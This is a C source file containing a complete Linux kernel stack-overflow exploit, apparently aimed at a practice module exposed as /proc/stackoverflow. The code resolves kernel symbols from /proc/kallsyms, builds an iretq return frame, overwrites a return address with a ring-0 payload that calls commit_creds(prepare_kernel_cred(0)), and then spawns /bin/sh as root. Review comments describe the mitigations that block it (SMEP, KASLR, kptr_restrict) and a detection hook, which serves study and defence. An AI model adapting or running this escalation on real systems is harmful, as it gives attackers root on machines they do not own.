#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <stdint.h>
/* Size of the payload buffer main() writes to the vulnerable module. */
#define SIZE 24
/* Kernel function-pointer types. regparm(3) is an i386 calling-convention
 * attribute; the inline asm in this file (movq/%rsp/swapgs/iretq) is x86-64,
 * where it presumably has no effect — looks like a leftover from a 32-bit
 * variant, harmless here. */
typedef int __attribute__((regparm(3))) (*printk_t)(const char *s, ...);
typedef int __attribute__((regparm(3))) (*commit_creds_t)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_t)(unsigned long cred);
/* Resolved at runtime by get_ksym() in main(); NULL when the lookup fails
 * or kernel.kptr_restrict hides kallsyms addresses. Nothing checks them
 * before ownedit() calls through them. */
printk_t printk;
commit_creds_t commit_creds;
prepare_kernel_cred_t prepare_kernel_cred;
/* Mirrors the five-quadword x86-64 iretq frame (rip, cs, rflags, rsp, ss).
 * main()'s asm fills it by byte offset (trap+8, +16, +24, +32) and
 * ownedit() loads %rsp with &trap before iretq, so field order, size and
 * the absence of padding are all load-bearing — do not reorder or extend. */
struct trap_frame {
void *rip;
unsigned long cs;
unsigned long rflags;
void *rsp;
unsigned long ss;
};
/* Global (not static) because the inline asm references it by symbol name. */
struct trap_frame trap;
/* Return-to-user landing point: main() stores this function in trap.rip, so
 * after ownedit()'s iretq execution resumes here in user mode and replaces
 * the process image with /bin/sh. execl() returns only on failure; that
 * result is deliberately ignored, matching the original. */
void pop_shell(){
const char *const shell = "/bin/sh";
(void)execl(shell, "sh", (char *)NULL);
}
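/* Looks up a kernel symbol's address in /proc/kallsyms.
 *
 * name:    symbol name to match exactly (third column of each line).
 * returns: the address printed on the matching line, or NULL if
 *          /proc/kallsyms cannot be opened, the symbol is not listed, or
 *          the kernel reports it as 0 (kernel.kptr_restrict hides addresses
 *          from unprivileged readers). Callers must check for NULL before
 *          calling through the result.
 *
 * Compared with the original: a failed fopen() no longer feeds NULL to
 * fscanf(), the stream is closed on every path (it used to leak on every
 * call), the %s conversion is width-bounded so an over-long name cannot
 * overrun sym[], and parsing is line-by-line so a line that does not match
 * the three-column shape is skipped instead of silently ending the scan.
 */
void *get_ksym(const char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    if (f == NULL) {
        return NULL;
    }
    void *found = NULL;
    char line[1024];
    while (found == NULL && fgets(line, sizeof line, f) != NULL) {
        void *addr = NULL;
        char type;
        char sym[512];
        /* "<addr> <type> <name>" — anything after the name is ignored. */
        if (sscanf(line, "%p %c %511s", &addr, &type, sym) != 3) {
            continue;
        }
        if (strcmp(sym, name) == 0) {
            found = addr;
        }
    }
    fclose(f);
    return found;
}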
/* Ring-0 payload: main() writes this function's address into the overflow
 * buffer, so this runs in kernel context if the module follows the
 * overwritten return address. It never returns normally — it leaves via
 * iretq through the `trap` frame prepared in main().
 *
 * Defender's view: this is the textbook commit_creds(prepare_kernel_cred(0))
 * escalation followed by a hand-built return to user mode. SMEP prevents the
 * kernel from executing this user-space page at all, KASLR plus
 * kernel.kptr_restrict break the symbol lookup that fills the three function
 * pointers, and the printk() call leaves an "I'm in!" line in the kernel
 * log, which is the obvious detection hook. */
void ownedit(void) {
/* No log level and no trailing newline — emitted as-is into dmesg. */
printk("I'm in!");
/* Replaces the current task's credentials with a fresh kernel credential
 * set (presumably root); the three pointers are unchecked, so a NULL from
 * get_ksym() would be called here. */
commit_creds(prepare_kernel_cred(0));
/* Point %rsp at the prepared frame, swap the GS base back for user mode,
 * and iretq: execution resumes in user mode at trap.rip (pop_shell) with
 * the cs/rflags/rsp/ss captured in main(). */
asm(
"movq $trap,%rsp;"
"swapgs;"
"iretq;"
);
}
/* Builds the overflow payload and writes it to the vulnerable module.
 *
 * Steps: resolve printk/prepare_kernel_cred/commit_creds from
 * /proc/kallsyms; snapshot this process's cs/rflags/rsp/ss into `trap` so
 * ownedit() can iretq back to user mode; place &ownedit 16 bytes into a
 * 24-byte buffer of 'A's; write the buffer to /proc/stackoverflow.
 *
 * Known weaknesses, left as-is and called out inline: the get_ksym()
 * results are never checked for NULL, the write() result and fd are
 * neither checked nor closed, `i` is unused, the asm clobbers %r12 without
 * declaring it, and the `ptr` initialiser casts through an integer type
 * instead of a pointer type. */
int main() {
char buf[SIZE];
int fd, i;
memset(buf, 'A', SIZE);
/* NOTE(review): each of these is NULL when the symbol is missing or
 * kernel.kptr_restrict zeroes kallsyms addresses; nothing checks for that
 * before ownedit() calls through them. */
printk = get_ksym("printk");
prepare_kernel_cred = get_ksym("prepare_kernel_cred");
commit_creds = get_ksym("commit_creds");
/* Return-to-user target for the iretq frame. */
trap.rip = &pop_shell;
/* Capture the current user-mode selectors, flags and stack pointer into
 * trap.cs/rflags/rsp/ss by byte offset (layout fixed by struct trap_frame).
 * %r12 is used as scratch with no clobber list, so the compiler cannot know
 * it is overwritten — TODO declare it, e.g. via an asm clobber. */
asm(
"movq %cs, %r12;"
"pushq %r12;"
"popq trap+8;" // prepare cs
"pushfq;"
"popq trap+16;" // prepare rflags;
"pushq %rsp;"
"popq trap+24;" // prepare rsp;
"movq %ss, %r12;"
"pushq %r12;"
"popq trap+32;" // prepare ss
);
/* Offset 16 is where the module's saved return address is assumed to land
 * inside the copied buffer — TODO confirm against the module. The cast
 * converts the address to an integer and relies on an implicit int-to-
 * pointer conversion back; (unsigned long long *) is the intended cast. */
unsigned long long *ptr = (unsigned long long)&buf[16];
*ptr = (unsigned long long)&ownedit;
if((fd = open("/proc/stackoverflow", O_RDWR)) == -1) {
perror("");
return -1;
}
/* Return value unchecked and fd never closed: on the expected path the
 * process is replaced by pop_shell()'s execl() and never gets here. */
write(fd, buf, sizeof(buf));
return 0;
}